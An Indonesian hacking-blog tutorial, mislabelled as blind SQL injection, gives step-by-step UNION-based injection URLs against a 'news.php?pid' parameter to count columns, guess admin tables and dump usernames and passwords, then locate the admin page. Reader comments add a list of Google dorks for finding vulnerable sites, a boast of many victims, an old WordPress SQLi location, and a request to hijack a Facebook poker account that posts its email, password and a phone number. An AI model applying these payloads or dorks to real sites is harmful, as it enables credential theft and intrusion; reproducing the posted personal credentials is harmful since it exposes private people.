Home / Hacking / Simple Blind SQL Injection Method
black-hat-logo

Simple Blind SQL Injection Method

Simple Blind SQL Injection Methode V4 Tutorial
Langkah Pertama:

Find the target
ex: /news.php?pid=1

Add character ‘ at end of url to find error message.
ex: /news.php?pid=1’ atau

===========
=step two=
===========

find and count to amount the table in database.
use the command : order by

es: [site]/news.php?pid=-1+order+by+1–

chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–

so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–

so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–

============
=step three=
============

for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–

=============
=step four:=
=============

find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users

use command +from+(table_name)–

ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error

and you can see the number is appear for example 2
go to the next step

============
=step five=
============

find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc

last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–

example appear : admin
admin is username

for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc

ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–

example appear : 123456
123456 is password

===============
=step six:=
===============

ok in the last step you must find admin page

ex : website.com/admin

sorry bhs inggris hehehehe..

=====================
: Special thx to :
Allah SWT

: My teacher :
vyc0d, Gonzhack
=====================
: thx to :
MR.FRIBO, DHIYAT, BOBYHIKARU, N4CK0, RAJEZ, AZZURE,SICK_HACKER, mas UTUH
AA EZHA, crusdd2, DIMAZ,DUDULS, slalu_ngantuk,ku51_g0y4n9 & BEJAMZ
: thx for the team :
N.G.U TEAM, CYBERDOS TEAM, HACKER NEWBIE TEAM, XPGROUND TEAM, DEVILZC0DE, TECON CREW, IDC
=====================

About S4T4N_CUR53

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

31 comments

  1. dah bnyk korban gw kok..
    masih bnyk web yang bugs kyk gni..

    dork nya nih..

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()

  2. kak tlng kirimkan video hacking sql injaction dan cara caranya.coz gw masih bingung.kok examplenya news.PhP?Pid=1 itu ulr apaan ya .Maklum msh newbie

    kirimkan ke email ku budimetal93@yahoo.com

  3. broooo……CMS wordpress bisa di sql injection ngk????

    klo bisa kasi tw cara ny dun9??????hehehehehehe

    salam. . . .

  4. @stinky
    ok bro tar ane kirimin ke email ente 🙂

    @rifki oke
    bisa ko justru kebanyakan pake SQLi tapi nge decript hashnya susah bro hehehee

  5. pak de bius…ajarin inject site https dunk

  6. emang https bsa di inject y? stau ane sih g bsa

  7. @d3r1l: https bisa di inject kok, asalkan ada vuln pada konteks php server / systemnya 🙂 there is no need. https itu cuma untuk pengirimian data yg di enkripsi supaya lebih aman. gak ada spy di perjalanan data.

  8. mas, bisa minta tolong dihackin account fbku gak, biar chip pokernya tambah banyak, soalnya ditempatku jualan chip tu rame bgt, nanti aku bagi deh hasilnya, transfer duit gitu, lumayan lho mas, 1B tu laku 7 jutaan, gimana?ada aja aku pembelinya, pokoknya chip ada, uang gak pernah susah….berminat? hubungi aja emailku: mikael_4ngello@yahoo.co.uk

    account fbku
    cute_casper91@yahoo.ca
    passwordnya : gundhabagus

    nanti kalo udah jadi, kasih tau lewat sms, 081359772416,
    sesama bisnis internet saling percaya aja…
    tolong mas, aku lagi BU(butuh duit)
    kasih aja 2B, nanti aku kasih 7 jt, gmn?
    pokoknya masukin dulu chipnya,
    ganti passwordnya, abis tu sms detailnya…

    balesan aku tunggu di mikael_4ngello@yahoo.co.uk

  9. blur,,,, sumpah ajarin w step by step dong…. kirim ke email w yah,,,, w lagi ada tugas tentang hacking nih dari dosen w,tpi pake SQL injections,,,, nieh email w jafar0n7@gmail.com

  10. @d3r1l_o1o1
    hiks.. hiks..
    setau ane sih, wordpress versi 2.2 kebawah yng bisa diinject,
    bug ny ada di file
    /wp-admin/admin-ajax.php ,

    mulai dari versi 2.2 keatas kykny blum ktemu bug sqli nyh .
    klo wordpress versi 2.3 smpet ada bug xss aja di file :
    /wp-admin/edit-post-rows.php

    utk https bner kt omz utuh , https itu cuma pengirimian data ny aja yg di enkripsi ,
    jd ga bisa di sniff a.k.a ngintip pke wireshark 😀 , klo sqli ya ttep bisa, coz sqli kn bug ny di aplikasi web nya , bukan di server 😀

    *CMIIW*

  11. @Init0: Yooo.. 🙂
    WP juga bs di SQLI sebenernya, cuman berhubung communitas codernya banyak. jadi cepet update sama releasenya.

    Info kelemahan WP sebenarnya ada di:
    http://core.trac.wordpress.org

    Ini sebenernya rahasia, tapi gpplah buat berbagi anak” binushacker. Wkwkwkw..
    Enjoy & eat it!

  12. “Keingintahuanku adalah sebagian dari kejahatanku”tp hatiku terlalu lembut untuk merusak.aq hanya ingin tahu…

  13. tuh udh di jawab sama bang utuh hehehe.. ane mah masih g bsa apa2 ane juniornya mas utuh 🙂

  14. om ajarin aku dund, cz aq msh newbie bngt nh,, and bg aku video and tutorial’a jg dund,, kirim za ke irham_21@yahoo.co.id trims y om

  15. minta tutz sqli dunk kk master… 🙂

    keeppix@gmail.com

  16. taek campur-taek campur

  17. hacking hacking

    aku suka belajar hacking

    tapi g mudeng2 …

    hacking hacking …

    dhuwur dewe ..

    tengkiu tutorialnya sob

  18. y elah… susah amat yak?

    cara perlahan dong master? kirim ke liveniping@yahoo.com ya

  19. bisa minta bantuannya uh gw harap trimood meed TOKE bisa habis, oiya gw punya akun Fb : facebook_apps_zynga@cyber-wizard.com
    ini akun khusus main poker hasilnya buat mendirikan CampsJakarta “Rumah Singah Di Jakarta” Untuk mereka yang dari daerah dan hal lain bermuatan sosial murni di garis balik tirai bambu

  20. ada nama saya di sana waw

  21. kk ak nda ngerti ak coba2 kok nda bisa ya tlg kirimin video nya ato gmana gt yg lebih jelas newbie bgt nih ak

  22. wah tutorial yang bagus

    nice info

  23. gan ada link Buat download SQL Injection V4 G..?? klo ada tlng share y thx….

  24. bos…
    ane minta modul hackingnya donk….
    plis namanya juga pemuda yang baru terjun………
    tapi cuma buat latihan aja, ga ada niat unsur ngerusak…….
    trims…..

  25. gan ko ga bisa yah…!!!
    ga mncul psan eror.a…???
    mhon bntuannya lgi donk…

  26. klo bleh mnta module.a donk…..
    dah nyoba tapi ga berhsil2…

  27. Ini bukannya SQLi biasa? Klo blind SQLi kan gak perlu pake /* atau —

    Klo kayak SQLi biasa kayak gitu saya juga udah bisa!

    Jangan nipu donk! Atau cuma asal copas aja nih…

  28. Thanks for a great posting! I loved reading it.

  29. Berhubung kalau search di google ‘blind sql injection’ halaman ini muncul paling atas, mau lurusin aja kalau Blind SQL Injection itu result dari injectionnya gak keliatan sama attackernya. Bukan yang pake coba-coba kayak begini. Jadi yang di atas ini sql injection biasa.

    CMIIW

  30. wahhh keren , ternyata sql injection itu sangat berbahaya ya… ckcckckc

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *